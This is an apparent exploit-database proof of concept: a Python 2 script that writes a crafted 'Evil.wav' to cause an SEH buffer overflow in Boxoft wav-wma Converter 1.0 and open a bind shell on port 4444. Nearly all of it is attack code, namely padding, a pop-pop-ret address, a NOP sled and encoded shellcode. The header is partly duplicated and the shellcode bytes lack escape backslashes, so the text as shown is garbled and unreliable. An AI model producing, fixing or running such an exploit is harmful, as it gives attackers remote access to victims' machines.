# Exploit Title: Boxoft wav-wma Converter - Local Buffer Overflow (SEH)
# Date: 2018-07-08
# Software Link: http://www.boxoft.com/wav-to-wma/
# Software Version:1.0
# Exploit Aut # Exploit Title: Boxoft wav-wma Converter - Local Buffer Overflow (SEH)
# Date: 2018-07-08
# Software Link: http://www.boxoft.com/wav-to-wma/
# Software Version:1.0
# Exploit Author: Achilles
# Target: Windows 7 x64
# CVE:
# Description: A malicious .wav file cause this vulnerability.
# Category: Local Exploit

buffer = "A" * 4132
buffer+= "x90x90xebx06" #jmp short 6
buffer+= "x34x14x40x00" # pop pop retn
buffer+= "x90" * 20
buffer+= ("xdaxd5xb8x9bx69x4dxa1xd9x74x24xf4x5ax33" #Bind shellcode port 4444
"xc9xb1x60x83xc2x04x31x42x15x03x42x15x79"
"x9cxf2x9bx0cxb0x35x05x03x97x32x91x2fx75"
"x92x10x7exdfxd5xdfx95x63xd0x24x96x1exca"
"xc6x57x4bxd9xe7x3cxe4x1cxa0xd9x7ex72xe4"
"x38x26xd1x92x88x79x63x55xe3x94xfex9axac"
"xb5xdexe4x35xbcxd0x9fxe6x92x63x51x5axaf"
"xadx1bxb0xf9x6ex46xacx68xa9x48xcexb8xe1"
"xd2xf5x1ax7dx84xdexb9x55xa0xe8xe3xd8xb2"
"x31xfbx1ax0bxeaxedxf4x8fxddxf5x55xbfx1a"
"xa5xe8xd8xfaxdex45x11x7cx4dxeax87x0fx9f"
"xe5xdfx90x18x7ex52x1bxd7x24x22xabx1bxda"
"x31xa2x75x8fxa3x13x99x20x5ex07x57x68x3e"
"x10xc7xc2xb0x2bxa0x13xd6x6ax3exc3x1ex99"
"x4fxf0xcex63x50xe3x90x80x3ex0ex9cx39x7e"
"x48xe6xf0xe7x3bxd3x7dxe3xa3x62x41xeex19"
"xd0xa8xc9xdbx02x93x0fx34xb0xadx81x08x57"
"xcexb8x38xfex13xc9xe7x40xc2x17xa6x3ax4c"
"x06x31xfcx3fx8fxcbx85x84x74x98x9cx63xe5"
"x46x2fxfcx15x3bx5cx37xd3x36xfcx39x3cx86"
"x29x32xbbxb3x04x13x6axd1xa7x55xacx8exa8"
"x05xafxc3xaex9dxc6x5fxa8x9dx8ex4ax25x3a"
"x35xa3xd7x4cxaaxb1x87xcax54x6dxdcxb2xf3"
"x3axaax29xeax44x01x4exb0x08x9axd0xb5x69"
"x42xe5xb4x5fx59xffxb4x90xe2x97x66x09x89"
"x87x8exffxa8x21x68x3fx01xe9xb3x27x63xd2"
"x93x2fx4dx9cx28x21xd4x9dxadx8fx24x19xc9"
"x98xbcx24x0bx47x84x9cx57xd2x20x79x71x67"
"xe0xd1xcdx40x51x7dxe2x39xa9xd2x92x4cx24"
"x59x7bxfdx89x6exeaxecxc8xacx54x8ax26x60"
"x81x38x06x32xabx56x1cxe7xd0x78xe5xa2x75"
"xc8x28x1bxd5x3fx51")

try:
f=open("Evil.wav","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"